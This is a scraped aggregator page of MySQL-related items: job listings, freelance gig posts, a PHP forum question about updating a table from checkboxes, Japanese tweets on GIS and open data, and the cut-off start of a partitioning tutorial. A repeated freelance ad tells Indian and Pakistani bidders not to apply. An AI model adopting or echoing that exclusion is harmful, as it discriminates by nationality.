Next Page: 10000

          Senior Mobile Developer - REACT - MatchBox Consulting Group - Burnaby, BC      Cache   Translate Page   Web Page Cache   
.net core/Java for middleware, MS SQL/MySQL RDS. MatchBox Consulting Group is currently searching for a Senior Developer - REACT to be part of a SCRUM team and... $95,000 a year
From MatchBox Consulting Group - Fri, 22 Jun 2018 08:15:00 GMT - View all Burnaby, BC jobs
          Sr Software Developer (Mobile App - Reactive) (7491258) - emergiTEL Inc. - Burnaby, BC      Cache   Translate Page   Web Page Cache   
.net core/Java for middleware, MS SQL/MySQL RDS. Leads design, development and documentation of a complex and comprehensive product suite.... $80,000 - $100,000 a year
From EmergiTel Inc. - Wed, 20 Jun 2018 06:49:20 GMT - View all Burnaby, BC jobs
          Software Developer Analyst - Evo Car Share Mobile App Developer - British Columbia Automobile Association - Burnaby, BC      Cache   Translate Page   Web Page Cache   
.net core/Java for middleware, MS SQL/MySQL RDS. Aon Hewitt has announced BCAA as a 2018 Canadian Gold Level Best Employer....
From British Columbia Automobile Association - Sun, 25 Mar 2018 05:46:19 GMT - View all Burnaby, BC jobs
          Senior Software Developer Analyst Evo Car Share Mobile App Developer - British Columbia Automobile Association - Burnaby, BC      Cache   Translate Page   Web Page Cache   
.net core/Java for middleware, MS SQL/MySQL RDS. Aon Hewitt has announced BCAA as a 2018 Canadian Gold Level Best Employer....
From British Columbia Automobile Association - Sun, 25 Mar 2018 05:46:18 GMT - View all Burnaby, BC jobs
          Lynda.com: MySQL for Advanced Analytics: Tips, Tricks, & Techniques      Cache   Translate Page   Web Page Cache   
MySQL is an excellent database for advanced analytics, but few analysts use it that way because they aren't fully aware of its capabilities in this area. Analysts end up writing code to perform common tasks—which can be time-consuming—rather than using MySQL to do the same work. In this course, learn tips and techniques for using MySQL for advanced data analytics. Kumaran Ponnambalam walks through the different stages of analytics, from data ingestion and transformation to generating statistics. In each stage, Kumaran focuses on letting MySQL do the heavy lifting rather than writing code in Java or Python. Discover how to perform data cleansing through MySQL update commands, find peak usage of any resource, perform centering and scaling of data to prepare for machine learning, and more. Plus, Kumaran shows how you can link MySQL with Microsoft Excel to get the best of both worlds.
          Build A Basic CRM Portal      Cache   Translate Page   Web Page Cache   
Manolo Portal Wishes Overall Features Manolo Bot is a creative way to communicate on behalf of manolo. (Used for all notifications and communication in the portal) User Management Login Verification... (Budget: $250 - $750 USD, Jobs: HTML, MySQL, PHP, WordPress)
          Amazon MWS API Expert      Cache   Translate Page   Web Page Cache   
*** DONT BID INDIAN, PAKISTAN *** Looking for an experienced programmer to do some work on a web application. Amazon MWS experience is mandatory. You will be fixing a few issues, connecting a form... (Budget: $250 - $750 USD, Jobs: Amazon Web Services, Linux, MySQL, PHP, Software Architecture)
          Build A Basic CRM Portal      Cache   Translate Page   Web Page Cache   
Manolo Portal Wishes Overall Features Manolo Bot is a creative way to communicate on behalf of manolo. (Used for all notifications and communication in the portal) User Management Login Verification... (Budget: $250 - $750 USD, Jobs: HTML, MySQL, PHP, WordPress)
          Amazon MWS API Expert      Cache   Translate Page   Web Page Cache   
*** DONT BID INDIAN, PAKISTAN *** Looking for an experienced programmer to do some work on a web application. Amazon MWS experience is mandatory. You will be fixing a few issues, connecting a form... (Budget: $250 - $750 USD, Jobs: Amazon Web Services, Linux, MySQL, PHP, Software Architecture)
          Hashed password not inserting into mysql database      Cache   Translate Page   Web Page Cache   
Forum: PHP Posted By: whizzbang Post Time: Jul 10th, 2018 at 05:37 AM
          I primarily build websites in a CMS      Cache   Translate Page   Web Page Cache   
I am a web developer and Designer with 10+ years worth of experience in HTML5, CSS3, PHP, WORDPRESS, MYSQL, LARAVEL, BOOTSTRAP, JQUERY/JAVASCRIPT. I help local businesses to build and maintain their websites. If you have an existing website or need a new one, I will take your idea and be creative wi
          Experienced in SEO and an expert in all aspects      Cache   Translate Page   Web Page Cache   
I am a web developer and Designer with 10+ years worth of experience in HTML5, CSS3, PHP, WORDPRESS, MYSQL, LARAVEL, BOOTSTRAP, JQUERY/JAVASCRIPT. I help local businesses to build and maintain their websites. If you have an existing website or need a new one, I will take your idea and be creative wi
          Web Developer / Designer / Update Existing Website      Cache   Translate Page   Web Page Cache   
I am a web developer and Designer with 10+ years worth of experience in HTML5, CSS3, PHP, WORDPRESS, MYSQL, LARAVEL, BOOTSTRAP, JQUERY/JAVASCRIPT. I help local businesses to build and maintain their websites. If you have an existing website or need a new one, I will take your idea and be creative wi
          Use a checkbox to update a mysql table      Cache   Translate Page   Web Page Cache   

I display a form which shows every record from my mysql table


I'm trying to turn the display field for the record to either 1 or 0 (depending on if the box is checked or not)
I got the form to display

	while($row = $stmt->fetch()) {
		
		switch($row['display']) {
		
		case 1:
			$display = 'checked';
			break;
		default:
			$display = '';
			break;
		}

	  echo '<tr>';
	  echo "<td>".$row['id']."</td>";
	  echo '<td>'.$row['userName'].' ('.$row['userID'].')</td>';
	  echo '<td><input type="hidden" name="userID['.$row['id'].']" value="'.$row['id'].'"><input type="checkbox" name="display['.$row['id'].']" value="'.$row['display'].'" '.$display.'></td>';
	  echo '</tr>';
	  echo "\r\n";

But how do I make it so that once the form is submitted, i only change the changed display property (1 or 0) in the mysql table?

Thanks


          Couldn't fetch mysqli      Cache   Translate Page   Web Page Cache   

Thanks for your help. I have fixed the issue


          Faster multiple inner joins or simple select with repeated data      Cache   Translate Page   Web Page Cache   

Hmmm it’s just a protype. I haven’t even done that yet. Just some tables I have put up and linked via their ids. I am going to download MySQL workbench or some such to put together a decent schema.

Still the idea of do not repeat yourself seemed like a flag to me.

At the most basic level, I will take your advice and not repeat myself. I will do the inner joins and come back to this space whenever got something better to present.

Thanks for your advice :slight_smile:#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000


          Uniface Developer - Oscar Technology - Rossendale      Cache   Translate Page   Web Page Cache   
Uniface Developer - Uniface - MySQL - Rossendale. Two Uniface Developers are required for a 6 month initial contract with my client....
From Oscar Technology - Thu, 05 Jul 2018 16:55:05 GMT - View all Rossendale jobs
          (5) build Forms fOR EXISTING WEBSITE      Cache   Translate Page   Web Page Cache   
i HAVE EXISTING WEBTIDE and I am looking for programmer that can add some extra functions for existing web page. This project has to be finish and tested in one day. The existing page need some forms that... (Budget: $10 - $20 CAD, Jobs: Javascript, MySQL, PHP, Website Design)
          Integration Architect - Silverline Jobs - Casper, WY      Cache   Translate Page   Web Page Cache   
Strong understanding of relational databases structure and functionality and experience with all major databases - Microsoft SQL Server, MYSQL, postgreSQL or...
From Silverline Jobs - Tue, 10 Jul 2018 00:33:35 GMT - View all Casper, WY jobs
          Technical Architect (Salesforce experience required) Casper - Silverline Jobs - Casper, WY      Cache   Translate Page   Web Page Cache   
Competency with Microsoft SQL Server, MYSQL, postgreSQL or Oracle. BA/BS in Computer Science, Mathematics, Engineering, or similar technical degree or...
From Silverline Jobs - Sat, 23 Jun 2018 06:15:28 GMT - View all Casper, WY jobs
          Software Developer - State of Wyoming - Cheyenne, WY      Cache   Translate Page   Web Page Cache   
Preference may be given to those with experience in MS SQL Server or MYSQL. This position is to provide development support in the design and implementation of... $4,506 - $5,632 a month
From State of Wyoming - Thu, 28 Jun 2018 20:49:57 GMT - View all Cheyenne, WY jobs
          Integration Architect - Silverline Jobs - Cheyenne, WY      Cache   Translate Page   Web Page Cache   
Strong understanding of relational databases structure and functionality and experience with all major databases - Microsoft SQL Server, MYSQL, postgreSQL or...
From Silverline Jobs - Tue, 10 Jul 2018 00:33:35 GMT - View all Cheyenne, WY jobs
          Technical Architect (Salesforce experience required) Cheyenne - Silverline Jobs - Cheyenne, WY      Cache   Translate Page   Web Page Cache   
Competency with Microsoft SQL Server, MYSQL, postgreSQL or Oracle. BA/BS in Computer Science, Mathematics, Engineering, or similar technical degree or...
From Silverline Jobs - Fri, 30 Mar 2018 06:14:53 GMT - View all Cheyenne, WY jobs
          (5) build Forms fOR EXISTING WEBSITE      Cache   Translate Page   Web Page Cache   
i HAVE EXISTING WEBTIDE and I am looking for programmer that can add some extra functions for existing web page. This project has to be finish and tested in one day. The existing page need some forms that... (Budget: $10 - $20 CAD, Jobs: Javascript, MySQL, PHP, Website Design)
          (5) build Forms fOR EXISTING WEBSITE      Cache   Translate Page   Web Page Cache   
i HAVE EXISTING WEBTIDE and I am looking for programmer that can add some extra functions for existing web page. This project has to be finish and tested in one day. The existing page need some forms that... (Budget: $10 - $20 CAD, Jobs: Javascript, MySQL, PHP, Website Design)
          How I Scaled a Website to 10 Million Users (Web-Servers & Databases, High Load, and Performance)      Cache   Translate Page   Web Page Cache   
Ex-Google Tech Lead Patrick Shyu talks about scalability, and how he grew a website to handle 10 million users (per month). I cover load balancing, content delivery networks, mysql query optimization, database master/slave replication, horizontal/vertical sharding, and more.
          today's howtos      Cache   Translate Page   Web Page Cache   

read more


          Use a checkbox to update a mysql table      Cache   Translate Page   Web Page Cache   

@lurtnowski wrote:

I display a form which shows every record from my mysql table


I'm trying to turn the display field for the record to either 1 or 0 (depending on if the box is checked or not)
I got the form to display

	while($row = $stmt->fetch()) {
		
		switch($row['display']) {
		
		case 1:
			$display = 'checked';
			break;
		default:
			$display = '';
			break;
		}

	  echo '<tr>';
	  echo "<td>".$row['id']."</td>";
	  echo '<td>'.$row['userName'].' ('.$row['userID'].')</td>';
	  echo '<td><input type="hidden" name="userID['.$row['id'].']" value="'.$row['id'].'"><input type="checkbox" name="display['.$row['id'].']" value="'.$row['display'].'" '.$display.'></td>';
	  echo '</tr>';
	  echo "\r\n";

But how do I make it so that once the form is submitted, i only change the changed display property (1 or 0) in the mysql table?

Thanks

Posts: 1

Participants: 1

Read full topic


          Developer      Cache   Translate Page   Web Page Cache   
VA-McLean, McLean, Virginia Skills : - 7+ years of experience programming in Java Application Development - 3+ years experience of Java, RESTFUL APIs, Spring/Spring Boot, Hibernate, etc - 3+ years experience with one of the following Web services like SOAP, REST and JSON and database technologies (MySQL, SQL) - 2+ years experience in Agile practices Description : Solid experience in emerging and traditional
          7月9日(月)のつぶやき その2      Cache   Translate Page   Web Page Cache   

【酪農学園大GIS研究室が環境大臣表彰受賞】

 酪農学園大学農食環境学群環境共生学類環境GIS研究室(金子正美教授)が、平成30年度の地域環境保全功労者環境大臣表彰を受賞し、6月29日(金曜日)、三好昇市長に受賞を報告しまし… twitter.com/i/web/status/1…

— 江別なう (@ebetsucity_now) 2018年7月3日 - 15:33

GIS活用の利点その1:空間情報の可視化。地図は多くの情報を視覚的にわかりやすく伝達できる媒体です。地図上に可視化すると、現状の理解、問題の発見、分析、プレゼン等に役立ちます。これは東京都の町丁単位の地震による建物倒壊危険度。高い… twitter.com/i/web/status/1…

— Mizuki Kawabata 河端瑞貴 (@mizuki_kawabata) 2018年7月2日 - 09:06

GIS活用の利点その2:空間情報の加工と作成。位置情報をキーに複数のデータを統合したり、データを加工することで、新しいデータを作成できます。たとえば「最寄り駅までの距離」、「公園隣接ダミー」、「半径○○以内の緑地面積」といった変数を作成し、モデルに入れて分析できます。

— Mizuki Kawabata 河端瑞貴 (@mizuki_kawabata) 2018年7月2日 - 09:07

GIS活用の利点その3:空間情報の分析。高機能なGISには多数の分析ツールが実装されています。これは残差のホットスポット(高い値の集積地)とコールドスポット(低い値の集積地)。重要な変数を見つけ出すヒントを与えてくれます。 pic.twitter.com/alscnuHrfi

— Mizuki Kawabata 河端瑞貴 (@mizuki_kawabata) 2018年7月2日 - 09:08

来週(今週末)のOSC北海道向けの準備を着々と進めていて(久々に資料をガッツリ作る系)、結構良い感じになってきたので楽しみ。1年後にはこんな内容は(基礎的すぎて)話せない状況になっていて欲しいけど、今はMySQLでのGIS利用(学習)の一歩としてピッタリと思う。

— 坂井 恵(SAKAI Kei) (@sakaik) 2018年7月2日 - 00:54

フリー&オープンなGISの祭典「FOSS4G TOKAI 2018」セッション | Peatix foss4g-tokai-coreday.peatix.com

日時: 2018年8月25日(土) 10:00〜17:00 (受付9:30〜)
会… twitter.com/i/web/status/1…

— niwasawa 迷子 (@niwasawa) 2018年7月1日 - 22:16

2018年8月25日(土) 10:00〜17:00:愛知大学 名古屋キャンパス / “フリー&オープンなGISの祭典「FOSS4G TOKAI 2018」セッション | Peatix” htn.to/pArYqi #GISevents #foss4gj

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:18

「FOSS4G TOKAI 2018」:fc2.to/17dkEL:【ブログ更新】#GISevents:「GIS(地理情報システム)活用推進ブログ」

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:21

会津若松市の職員向けオープンデータQ&Aが面白い。「ネタ募集中」って何だよw 【PDF】 city.aizuwakamatsu.fukushima.jp/docs/200912240… pic.twitter.com/kWEIvQGUBw

— Shuji Ishida (@ishidashuji) 2018年7月9日 - 21:30

まちのデータ研究室『地域情報利活用アプリ開発講座』
オープンデータ等の取り込みから、蓄積・加工・可視化および、データに基づく知識発見に至るまでの一連のデータ利活用プロセスを体験します。… twitter.com/i/web/status/1…

— e-とぴあ・かがわ (@etopiakagawa) 2018年7月8日 - 12:46

高松市や香川県が提供しているオープンデータ等の地域情報(データ)を利用し、様々な視点から可視化できるソフトウェア(アプリ)の開発を全12回のコースで学びます。 / “まちのデータ研究室|情報通信交流館…” htn.to/ymRVW8 #オープンデータevent

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:24

『地域情報利活用アプリ開発講座』:fc2.to/lmsHRZ:【ブログ更新】#オープンデータevents#opendata:うじじす@オープンデータeventブログ

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:28

国土交通省系の(一財)河川情報センターが有償提供している雨量・水位などの「オープンデータ」。それは本当にオープンといえるのかという指摘や「実費」が高いのではという指摘があり、僕もその指摘は正しいのではないか、検証が必要ではないかと… twitter.com/i/web/status/1…

— 庄司昌彦, Masahiko Shoji (@mshouji) 2018年7月6日 - 08:42

こんにちは!稲継ゼミです🤗
2年生の皆さんは、そろそろどのゼミに入るか考え始める頃かと思います🤔💭そこでお知らせです🌟

【稲継ゼミ オープンゼミ】
日時:7/10(火) 5限
場所:3-606
内容:"オープンデータ"を用いて、… twitter.com/i/web/status/1…

— 2018 稲継ゼミ*早稲田政経 (@inatsugu19) 2018年6月13日 - 12:07

それでも気になる、河川の水位。鯖江市では、さくらインターネット協力により、省電力広域無線(LPWA)の一種、"LoRa"を使った水位計測IoTのリアルタイムオープンデータをアプリと共に公開。 htn.to/FSU7Bd #災害情報 #オープンデータ

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:32

水防災オープンデータ提供サービスについて − 利用規定 river.or.jp/01suuchi/img/0… には
>(3)第三者への配信やサービスの提供を有償で行うことができる。
>(4)受信した数値データを無加工で第三者へ二次配信することはできない。
とある。

— あめいぱわーにおまかせろ! (@amay077) 2018年7月6日 - 10:51

ちょっと川を見てくるをIoT化!
LoRaを使って鯖江市内6箇所で実験中の格安水位計測IoT&リアルタイムオープンデータ、データシティ鯖江で公開スタート
fukuno.jig.jp/2173

— 福野泰介 (@taisukef) 2018年7月6日 - 09:54

第4回目となる「CIVIC TECH FORUM」が2018年6月2日、東京都内で開催された。 / “地域課題の解決を目指す50の取り組みが競演 | 新・公民連携最前線 PPPまちづくり” htn.to/JjyhU #シビックテック #オープンデータ

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:35

【7/31(火)香川】まちのデータ研究室 地域情報利活用アプリ開発講座 応募締切
e-topia-kagawa.jp/kouza/towndata…
8/18(土)~3/9(日) 定員20名
"高松市や香川県が提供しているオープンデータ等の地域情報(… twitter.com/i/web/status/1…

— 鎌玉 大 (@kamatamadai) 2018年7月5日 - 02:10

発表者と討論者(僕)は、特定の目的を持って公開するのは本来のオープンデータの趣旨と違うよねという話をしたと記憶してますが、伝わらなかったのかな。異論あるならその場で言ってくれればいいのに。 twitter.com/hirokoyamamoto…

— 庄司昌彦, Masahiko Shoji (@mshouji) 2018年7月4日 - 20:53

《データの「今」》
「自由に見ることができるのは当然で、それに加えて何をしてもいいように「開放」されたデータがオープンデータです。」内閣官房 オープンデータ伝道師 庄司昌彦 #データのじかん
buff.ly/2M8FYzK

— データのじかん (@datanojikan) 2018年7月2日 - 18:30

IoTとビッグデータ・オープンデータを考える ~IoTとデータ活用で価値創造への挑戦~:fc2.to/237bCY:【ブログ更新】#オープンデータevents#opendata:うじじす@オープンデータeventブログ

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:40

International Workshop on Data Science 2018:fc2.to/pvyLRS:【ブログ更新】#オープンデータevents#opendata:うじじす@オープンデータeventブログ

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:46

Asia Open Data Hackathon:fc2.to/3dwGSW:【ブログ更新】#オープンデータevents#opendata:うじじす@オープンデータeventブログ

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:50

平成30年6月27日(水曜)に、PlanT 多摩平の森産業連携センターにおいて明星大学と多摩5市(八王子市・町田市・日野市・多摩市・稲城市)でオープンデータイベント(アイデアソン)を開催しました / “明星大学…” htn.to/6EFh5HJ #オープンデータ

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:50

国立国会図書館デジタルコレクション書誌情報のオープンデータセットを更新しました。
ndl.go.jp/jp/dlib/standa…

— 国立国会図書館 NDL (@NDLJP) 2018年7月2日 - 14:40

“国立国会図書館デジタルコレクション書誌情報” / “オープンデータセット|国立国会図書館-National Diet Library” htn.to/7ZEpvwG #図書館 #オープンデータ

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:52

“両丹日日新聞 : 公立大がシクロタクシー 高齢者支援や観光案内” htn.to/q2Yri9 #福知山市

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:55
          7月9日(月)のつぶやき その1      Cache   Translate Page   Web Page Cache   

Data(Driven) Journalism post 紙が更新されました! paper.li/ujigis/1389940… おかげで @Ali_Tehrani @fpiccato @MediaEu #journalism #data

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 06:42

記録的豪雨。広島県、岡山県の全容把握はこれから?
災害救助法適用された7府県の災害報から市町村別の被害をスプレッドシートにまとめました。>7府県被害状況まとめ(7/7現在) gensaiinfo.com/blog/disaster/…twitter.com/i/web/status/1…

— 減災インフォ (@gensaiinfo) 2018年7月8日 - 05:28

ujigis opendata Times 紙が更新されました! paper.li/ujigis/1387861… おかげで @lamachineacafe @docfranzke @oliverrack #opendata #bigdata

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 19:58

今津勝紀先生の研究成果の一部 cc.okayama-u.ac.jp/~kimazu/map/ma… GISで利用できる旧国日本地図(shapeファイル)などもあります。

— 山口欧志 (@H_Y77) 2013年2月22日 - 18:04

旧国日本地図 (shape版) 、旧国日本地図(古代) (shape版) 、備中国郡図 (shape版) / “今津勝紀の研究と教育” htn.to/eAWCPk #HistoricalGIS

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 21:27

#リアルタイム GIS を実現する ArcGIS GeoEvent Server ~ SNS とつながる! #Twitter 上のつぶやきを地図で可視化 - blog.esrij.com/2018/07/06/pos… pic.twitter.com/CmC2g0dOOe

— ESRIジャパン ブログ (@EsriJapanBlog) 2018年7月6日 - 19:00

地盤、地質、GIS、建機あたり強めですね。

— トレンド銘柄のK.K (@analyzesoon) 2018年7月9日 - 08:43

「絵図は情報の玉手箱。作成時の時代背景や作成者の意図,測量技術の巧拙など,最新のGIS技術を駆使して近世測量絵図を読み解く」琉球王国・徳島藩・加賀藩(金沢)ほか。
⇒平井松午、安里進、渡辺誠編『近世測量絵図のGIS分析』古今書院kokon.co.jp/book/b166056.h…

— 猫の泉 (@nekonoizumi) 2014年2月14日 - 22:54

歴史地理学・地図史などの研究者15名による歴史GIS研究の成果。 / “近世測量絵図のGIS分析 - 古今書院 Since1922 地理学とともに歩む” htn.to/yFoWzHZ #HistoricalGIS

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 21:43

宇宙APIのサイトをご紹介します!

◆宇宙ディレクトリ
無償公開されている衛星データと、利用に必要なGISデータ、アプリケーションなどを揃えました早見表で各データを比較することができます。 spaceapi.info/spacedirectory/

— 宇宙ビジネスコート/Space Business Court (@SpaceBizCourt) 2018年7月8日 - 09:00

「GIS]“宇宙ディレクトリ 無償公開されている衛星データと、利用に必要なGISデータ、アプリケーションなどを揃えました早見表で各データを比較することができます” / “宇宙ディレクトリ|宇宙API” htn.to/NGPeog #地理空間情報

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 21:45

【北海道公式ウェブサイト】【オープンデータ活用事例】「ひなたGIS」に北海道森林情報が追加されました。【総合政策部 情報統計局情報政策課】
pref.hokkaido.lg.jp/ss/jsk/opendat…
#CCBY

— 北海道 (@PrefHokkaido) 2018年7月6日 - 15:52

OSC2018北海道でのセミナー資料公開しました。「MySQLに本格GIS機能がやってきた」
slideshare.net/sakaik/mysqlgi… #mysql_jp #osc18do

— 坂井 恵(SAKAI Kei) (@sakaik) 2018年7月7日 - 18:33

“MySQLに本格GIS機能がやってきた~MySQL8.0最新情報~” htn.to/QjVyJS #GIS #MySQL

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 21:47

NHKってGIS扱える人いないのかな?
この図から正確な降水量を理解するのは難しいし、日本海側の降水量は見えない。 pic.twitter.com/dUcUvywIZf

— はーつくらい (@_HeartsCry) 2018年7月7日 - 09:42

斎藤英二 (2017) 日本列島下の海洋プレートのGISデータ作成. 地質調査総合センター研究資料集,no. 647,産総研地質調査総合センター
gsj.jp/researches/ope…
shapefile で公開されている… twitter.com/i/web/status/1…

— S.Hirano (@Bimaterial) 2018年7月6日 - 23:40

“データはShapefile、qgisおよびjsonであり、Web-GL対応ブラウザでみることもできる。” / “no. 647 / 日本列島下の海洋プレートのGISデータ作成|研究紹介|産総研地質調査…” htn.to/Baj88m #GIS #地理空間情報

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 21:52

防災科研のシステムと、県が開発した地理情報システム「ひなたGIS」とを連携させ、救援物資の支援が必要な場所の特定や、避難の呼び掛けなどが迅速に発信できるシステムを開発し、来年度からの導入を目指す
>災害情報システム開発へ 県、防災… twitter.com/i/web/status/1…

— 減災インフォ (@gensaiinfo) 2018年7月3日 - 22:33

AWSからオンデマンドサービスを提供するEO / GISトレーニングラボ/EO/GIS Training Lab with On-demand Services from AWS zpr.io/6sGSP

— 吉田真吾 / CYDAS (@yoshidashingo) 2018年7月6日 - 03:23

告知しそびれてたので、こっちもついでに宣伝。こちらは関学のリポジトリで全文公開されています。
波江彰彦(2017.12)「地理学を専攻しない学生を対象とする地理情報システム(GIS)教育の実践と課題―甲南大学文学部における授業を事… twitter.com/i/web/status/1…

— 波江彰彦 (@namie_ak) 2018年7月5日 - 23:48

昨日獨協大学地域総合研究所の研究会にて、所長の倉橋先生にお声掛けいただき、「都市地域研究におけるGISの活用-女性就業と通勤時間ー」について講演しました。研究、教育、政策におけるGISの活用法等について、参加者の皆様と有益な議論ができました。

— Mizuki Kawabata 河端瑞貴 (@mizuki_kawabata) 2018年7月5日 - 13:22

酪農学園大学の環境GIS研究室が「平成30年度地域環境保全功労者」環境大臣表彰を受賞 -- 小学校向けの出前授業「巨大空中写真に見る江別の環境」など環境教育活動が評価 u-presscenter.jp/2018/07/post-3…

— 大学プレスセンター (@u_presscenter) 2018年7月5日 - 10:05

【事例】西日本高速道路エンジニアリング九州株式会社では、高速道路の点検業務にArcGISを活用し、現場調査員がタブレット端末でGISを利用しています。ArcGISの導入により、作業の準備から点検作業、点検後のデータ管理など、一連の… twitter.com/i/web/status/1…

— ESRIジャパン (@ESRIJapan) 2018年7月4日 - 19:30

#日本の滝100選 にも選ばれている大分県の原尻の滝をドローンで撮影し、Drone2Map for ArcGISで3Dデータを作成しました。Drone2Map for ArcGISは専門知識不要で簡単に撮影画像からGISデータを作… twitter.com/i/web/status/1…

— ESRIジャパン (@ESRIJapan) 2018年7月4日 - 12:00

MySQL 8.0はGIS、RDBとNoSQLのハイブリッド、API、データ分析/処理/耐障害性/セキュリティ機能を強化。Oracle Labsからは「MySQL Autonomous DB」構想が語られ、自動チューニングによりM… twitter.com/i/web/status/1…

— いとうちひろ(Chihiro Ito) (@chiroito) 2018年7月4日 - 11:47

第57回古代山城研究会「古代山城とノロシ~高速軍事通信の実態 ~」:ujigis.blog.fc2.com/blog-entry-182…:【ブログ更新】#GISevents:「GIS(地理情報システム)活用推進ブログ」

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:11

奈良大学は、平成30年度 奈良大学学校教員研修支援オープン講座として、「GIS講座」を、2018年8月3日(金)に開催します。
2022年、GIS(Geographic Information System:地理情報シス ... – is.gd/t3vqgX

— 教育家庭新聞 (@kyoikukatei) 2018年7月3日 - 15:59

新学習指導要領への移行準備やGIS導入事例、実習による教員サポートを行います。 / “奈良大学学校教員研修支援オープン講座「GIS講座」8月3日開講|KKS Web:教育家庭新聞ニュース|教育家庭新聞社” htn.to/7QS7xGg #GIS教育

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:13

奈良大学学校教員研修支援オープン講座「GIS講座」:fc2.to/1grBKX:【ブログ更新】#GISevents:「GIS(地理情報システム)活用推進ブログ」

— ジオねこ@うじじす ☘️geo-cat (@ujigis) 2018年7月9日 - 22:14

第1回入ゼミ説明会にてPEARL生はゼミに入れますか?という質問がいくつか見られました!
①日本語で進行するゼミに問題なく参加できる方
②PEARL生は河端教授の経済地理を履修できないため、自主的にGISの勉強を行える方
の2つの… twitter.com/i/web/status/1…

— 河端瑞貴研究会 (@kwbt_seminar) 2018年7月3日 - 15:44
          MySQL Database Administrator - Clio - Vancouver, BC      Cache   Translate Page   Web Page Cache   
We could talk to you about our ping pong table, beer taps, yoga classes, and nap room, but, we know you’re looking for more than that....
From Clio - Tue, 10 Jul 2018 22:33:03 GMT - View all Vancouver, BC jobs
          Technical Lead (PHP & MySQL) - Vanilla - Montréal, QC      Cache   Translate Page   Web Page Cache   
Excellent communication skills are critical whether you’re talking to a developer or anyone else in the company....
From Vanilla - Thu, 29 Mar 2018 23:13:58 GMT - View all Montréal, QC jobs
          Technical Lead (PHP & MySQL) - Vanilla - Montréal, QC      Cache   Translate Page   Web Page Cache   
High-traffic web properties. Vanilla is looking for a talented and creative Technical Lead / Software Architect who wants to join a profitable and rapidly...
From Vanilla - Thu, 29 Mar 2018 23:13:58 GMT - View all Montréal, QC jobs
          Empregos Programador Em C# – São Leopoldo-Rs      Cache   Translate Page   Web Page Cache   

Programador em C#, e é essencial os conhecimentos em Mvc, sql server, Mysql, JavaScript e Xamarin. Requisitos: Experiência nas programações citadas. Jornada de Trabalho: De segunda a sexta das 8h às 18h. Salário faixa de R$ 3.500,00 Benefícios: VT; VR; Seguro de vida; Plano de saúde.

O post Empregos Programador Em C# – São Leopoldo-Rs apareceu primeiro em Emprega Sul.


          Marten Mickos of MySQL on building Open Source Software businesses      Cache   Translate Page   Web Page Cache   
I had the privilege of attending an informal presentation by Marten Mickos, CEO of MySQL, last week at SAP Labs. Marten was his usual candid self, and spoke frankly about the challenges of making money in Open Source, why MySQL...
          Importacion xml a mysql      Cache   Translate Page   Web Page Cache   
Buenas a ver si alguno de vosotros me saca del...
          What is MySQL partitioning ?      Cache   Translate Page   Web Page Cache   
MySQL partitioning makes data distribution of individual tables (typically we recommend partition for large & complex I/O table for performance, scalability and manageability) across multiple files based on partition strategy / rules. In very simple terms, different portions of table are stored as separate tables in different location to distribute I/O optimally. The user defined division of data by some rule is known as partition function, In MySQL we partition data by RANGE of values / LIST of values / internal hashing function / linear hashing function. By restricting the query examination on the selected partitions by matching rows increases the query performance by multiple times compared to the same query on a non partitioned table, This methodology is also called partition pruning (trimming of unwanted partitions), Please find below example of partition pruning: CREATE TABLE tab1 ( col1 VARCHAR(30) NOT NULL, col2 VARCHAR(30) NOT NULL, col3 TINYINT UNSIGNED NOT NULL, col4 DATE NOT NULL ) PARTITION BY RANGE( col3 ) ( PARTITION p0 VALUES LESS THAN (100), PARTITION p1 VALUES LESS THAN (200), PARTITION p2 VALUES LESS THAN (300), PARTITION p3 VALUES LESS THAN MAXVALUE ); Write a SELECT query benefitting partition pruning: SELECT col1, col2, col3, col4 FROM tab1 WHERE col3 > 200 AND col3 < 250; What is explicit partitioning in MySQL and how is it different from partition pruning ?  In MySQL we can explicitly select partition and sub-partitions when executing a statement matching a given WHERE condition, This sounds very much similar to partition pruning, but there is a difference: Partition to be checked are explicitly mentioned in the query statement, In partition pruning it is automatic. In explicit partition, the explicit selection of partitions is supported for both queries and DML statements, partition pruning applies only to queries. SQL statements supported in explicit partitioning – SELECT, INSERT, UPDATE, DELETE, LOAD DATA, LOAD XML and REPLACE Explicit partition example: CREATE TABLE customer ( cust_id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, cust_fname VARCHAR(25) NOT NULL, cust_lname VARCHAR(25) NOT NULL, cust_phone INT NOT NULL, cust_fax INT NOT NULL ) PARTITION BY RANGE(cust_id) ( PARTITION p0 VALUES LESS THAN (100), PARTITION p1 VALUES LESS THAN (200), PARTITION p2 VALUES LESS THAN (300), PARTITION p3 VALUES LESS THAN MAXVALUE ); Query explicitly mentioning partition: mysql> SELECT * FROM customer PARTITION (p1); RANGE partitioningIn RANGE partitioning you can partition values within a given range, Ranges should be contiguous but not overlapping, usually defined by VALUES LESS THAN operator, The following examples explain how to create and use RANGE partitioning for MySQL performance: CREATE TABLE customer_contract( cust_id INT NOT NULL, 